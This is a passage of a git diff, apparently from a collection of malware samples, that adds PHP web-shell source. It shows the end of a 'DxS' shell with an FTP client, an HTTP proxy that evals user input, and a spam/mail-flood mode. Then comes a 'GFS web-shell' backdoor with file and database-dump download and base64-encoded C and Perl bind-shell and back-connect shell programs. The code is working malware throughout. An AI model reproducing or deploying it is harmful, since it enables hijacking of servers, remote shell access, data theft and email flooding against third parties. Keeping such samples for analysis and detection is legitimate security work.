$_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed')); + if (isset($_POST['DxFTP_UPL'])) + if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to upload')); else print 'Upload OK'; + if (isset($_POST['DxFTP_DWN'])) + if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII)) + die(DxError('Failed to download')); else print 'Download OK'; + ftp_close($FTP); + } + } + +######## +######## HTTP Proxy +######## +if ($_GET['dxmode']=='PROX') + { + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table width=100% cellspacing=0>'; + print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">' + .' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>'; + print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">'; + print "\n".'</td></tr></table></form>'; + + if (!isset($_POST['DxProx_Url'])) die(); + + print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n"; + + if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array(); + else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();} + if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array(); + else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();} + + $URLPARSED=parse_url($_POST['DxProx_Url']); + $request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']); + if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) + die(DxError('Sock #'.$errno.' : '.$errstr)); + fputs($f, $request); + + $RET=''; + while (!feof($f)) $RET.=fgets($f, 4096 ); + fclose( $f ); + + print "\n".'<table width=100% border=0><tr><td>'; + $headers_over_place=strpos($RET,"\r\n\r\n"); + if ($headers_over_place===FALSE) print $RET; + else + print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place); + print str_repeat("\n", 10).'</td></tr></table>'; + } + +######## +######## MAIL +######## +if ($_GET['dxmode']=='MAIL') + { if (!isset($_GET['dxparam'])) + { + print ''; print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">'; + DxGETinForm('leave', ''); + print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">' + .'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>' + .'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">'; + print "\n".'</form>'; + die();} + + if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')'); + print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>'; + if ($_GET['dxparam']=='FLOOD') + { print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.( (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM'] ).'" SIZE=10></td></tr>'; + } + else print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.( (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.( (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM'] ).'>" style="width:100%;"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.( (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ'] ).'"></td></tr>'; + print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.( (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG'] ).'</textarea></td></tr>'; + print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>'; + print "\n".'</td></table></form>'; + + if (!isset($_POST['DxMailer_TO'])) die(); + + $HEADERS=''; + $HEADERS.= 'MIME-Version: 1.0'."\r\n"; + $HEADERS.= 'Content-type: text/html;'."\r\n"; + $HEADERS.='To: %%TO%%'."\r\n"; + $HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n"; + $HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n"; + $HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n"; + $HEADERS.='Message-Id: <%%ID%%>'; + + if ($_GET['dxparam']=='FLOOD') + { $NUM=$_POST['DxMailer_NUM']; + $MAILS=array($_POST['DxMailer_TO']); + } + else + { $MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO'])); + $NUM=1; + } + + function DxMail($t, $s, $m, $h) /* debugger */ + {print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;} + + $RESULTS[]=array(); + + for ($n=0;$n<$NUM;$n++) + for ($m=0;$m<count($MAILS);$m++) $RESULTS[]=(int) + mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'], + str_replace(array('%%TO%%','%%IP%%', '%%ID%%'), + array('<'.$MAILS[$m].'>' , long2ip(mt_rand(0,pow(2,31))) , md5($n.$m.DxRandomChars(3).time())), + $HEADERS) + ); + + print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.( (100*array_sum($RESULTS))/($NUM*(count($MAILS))) ).'% okay)'; + + } + +if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>'; +die(); +?> + diff --git a/PHP/Backdoor.PHP.Agent.at b/PHP/Backdoor.PHP.Agent.at new file mode 100644 index 00000000..603741e5 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.at @@ -0,0 +1,618 @@ +<? +/* +************************* +* ###### ##### ###### * +* ###### ##### ###### * +* ## ## ## * +* ## #### ###### * +* ## ## #### ###### * +* ## ## ## ## * +* ###### ## ###### * +* ###### ## ###### * +* * +* Group Freedom Search! * +************************* +GFS Web-Shell +*/ +error_reporting(0); +if($_POST['b_down']){ + $file=fopen($_POST['fname'],"r"); + ob_clean(); + $filename=basename($_POST['fname']); + $filedump=fread($file,filesize($_POST['fname'])); + fclose($file); + header("Content-type: application/octet-stream"); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); +} +if($_POST['b_dtable']){ + $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + if($dump!=""){ + header("Content-type: application/octet-stream"); + header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";"); + echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + exit(); + }else + die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']); +} +set_magic_quotes_runtime(0); +set_time_limit(0); +ini_set('max_execution_time',0); +ini_set('output_buffering',0); +if(version_compare(phpversion(), '4.1.0')==-1){ + $_POST=&$HTTP_POST_VARS; + $_GET=&$HTTP_GET_VARS; + $_SERVER=&$HTTP_SERVER_VARS; +} +if (get_magic_quotes_gpc()){ + foreach ($_POST as $k=>$v){ + $_POST[$k]=stripslashes($v); + } + foreach ($_SERVER as $k=>$v){ + $_SERVER[$k]=stripslashes($v); + } +} +if ($_POST['username']==""){ + $_POST['username']="root"; +} +//////////////////////////////////////////////////////////////////////////////// +///////////////////////////// Ïåðåìåííûå /////////////////////////////////////// +//////////////////////////////////////////////////////////////////////////////// +$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']; +$r_act=$_POST['r_act']; +$safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà +$mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql +$curl_on=function_exists('curl_version'); //íàëè÷èå cURL +$dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè +$HTML=<<<html +<html> +<head> +<title>GFS web-shell ver 3.1.7</title> +</head> +<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> +html; +$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9 +MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4 +gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG +ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc +mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1 +LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI="; +$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk +X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR +TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE +FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ +W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h +Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ +lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy +BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V +VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk +bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5 +lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi +BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS +VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN +CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk +7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG +ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd +XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+ +c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw +iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC +R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y +29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y +ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR +QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG +Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D +QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug +PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N +0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi +A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9"; +$port[1] = "tcpmux (TCP Port Service Multiplexer)"; +$port[2] = "Management Utility"; +$port[3] = "Compression Process"; +$port[5] = "rje (Remote Job Entry)"; +$port[7] = "echo"; +$port[9] = "discard"; +$port[11] = "systat"; +$port[13] = "daytime"; +$port[15] = "netstat"; +$port[17] = "quote of the day"; +$port[18] = "send/rwp"; +$port[19] = "character generator"; +$port[20] = "ftp-data"; +$port[21] = "ftp"; +$port[22] = "ssh, pcAnywhere"; +$port[23] = "Telnet"; +$port[25] = "SMTP (Simple Mail Transfer)"; +$port[27] = "ETRN (NSW User System FE)"; +$port[29] = "MSG ICP"; +$port[31] = "MSG Authentication"; +$port[33] = "dsp (Display Support Protocol)"; +$port[37] = "time"; +$port[38] = "RAP (Route Access Protocol)"; +$port[39] = "rlp (Resource Location Protocol)"; +$port[41] = "Graphics"; +$port[42] = "nameserv, WINS"; +$port[43] = "whois, nickname"; +$port[44] = "MPM FLAGS Protocol"; +$port[45] = "Message Processing Module [recv]"; +$port[46] = "MPM [default send]"; +$port[47] = "NI FTP"; +$port[48] = "Digital Audit Daemon"; +$port[49] = "TACACS, Login Host Protocol"; +$port[50] = "RMCP, re-mail-ck"; +$port[53] = "DNS"; +$port[57] = "MTP (any private terminal access)"; +$port[59] = "NFILE"; +$port[60] = "Unassigned"; +$port[61] = "NI MAIL"; +$port[62] = "ACA Services"; +$port[63] = "whois++"; +$port[64] = "Communications Integrator (CI)"; +$port[65] = "TACACS-Database Service"; +$port[66] = "Oracle SQL*NET"; +$port[67] = "bootps (Bootstrap Protocol Server)"; +$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; +$port[69] = "Trivial File Transfer Protocol (tftp)"; +$port[70] = "Gopher"; +$port[71] = "Remote Job Service"; +$port[72] = "Remote Job Service"; +$port[73] = "Remote Job Service"; +$port[74] = "Remote Job Service"; +$port[75] = "any private dial out service"; +$port[76] = "Distributed External Object Store"; +$port[77] = "any private RJE service"; +$port[78] = "vettcp"; +$port[79] = "finger"; +$port[80] = "World Wide Web HTTP"; +$port[81] = "HOSTS2 Name Serve"; +$port[82] = "XFER Utility"; +$port[83] = "MIT ML Device"; +$port[84] = "Common Trace Facility"; +$port[85] = "MIT ML Device"; +$port[86] = "Micro Focus Cobol"; +$port[87] = "any private terminal link"; +$port[88] = "Kerberos, WWW"; +$port[89] = "SU/MIT Telnet Gateway"; +$port[90] = "DNSIX Securit Attribute Token Map"; +$port[91] = "MIT Dover Spooler"; +$port[92] = "Network Printing Protocol"; +$port[93] = "Device Control Protocol"; +$port[94] = "Tivoli Object Dispatcher"; +$port[95] = "supdup"; +$port[96] = "DIXIE"; +$port[98] = "linuxconf"; +$port[99] = "Metagram Relay"; +$port[100] = "[unauthorized use]"; +$port[101] = "HOSTNAME"; +$port[102] = "ISO, X.400, ITOT"; +$port[103] = "Genesis Point-to-Point"; +$port[104] = "ACR-NEMA Digital Imag. & Comm. 300"; +$port[105] = "CCSO name server protocol"; +$port[106] = "poppassd"; +$port[107] = "Remote Telnet Service"; +$port[108] = "SNA Gateway Access Server"; +$port[109] = "POP2"; +$port[110] = "POP3"; +$port[111] = "Sun RPC Portmapper"; +$port[112] = "McIDAS Data Transmission Protocol"; +$port[113] = "Authentication Service"; +$port[115] = "sftp (Simple File Transfer Protocol)"; +$port[116] = "ANSA REX Notify"; +$port[117] = "UUCP Path Service"; +$port[118] = "SQL Services"; +$port[119] = "NNTP"; +$port[120] = "CFDP"; +$port[123] = "NTP"; +$port[124] = "SecureID"; +$port[129] = "PWDGEN"; +$port[133] = "statsrv"; +$port[135] = "loc-srv/epmap"; +$port[137] = "netbios-ns"; +$port[138] = "netbios-dgm (UDP)"; +$port[139] = "NetBIOS"; +$port[143] = "IMAP"; +$port[144] = "NewS"; +$port[150] = "SQL-NET"; +$port[152] = "BFTP"; +$port[153] = "SGMP"; +$port[156] = "SQL Service"; +$port[161] = "SNMP"; +$port[175] = "vmnet"; +$port[177] = "XDMCP"; +$port[178] = "NextStep Window Server"; +$port[179] = "BGP"; +$port[180] = "SLmail admin"; +$port[199] = "smux"; +$port[210] = "Z39.50"; +$port[213] = "IPX"; +$port[218] = "MPP"; +$port[220] = "IMAP3"; +$port[256] = "RAP"; +$port[257] = "Secure Electronic Transaction"; +$port[258] = "Yak Winsock Personal Chat"; +$port[259] = "ESRO"; +$port[264] = "FW1_topo"; +$port[311] = "Apple WebAdmin"; +$port[350] = 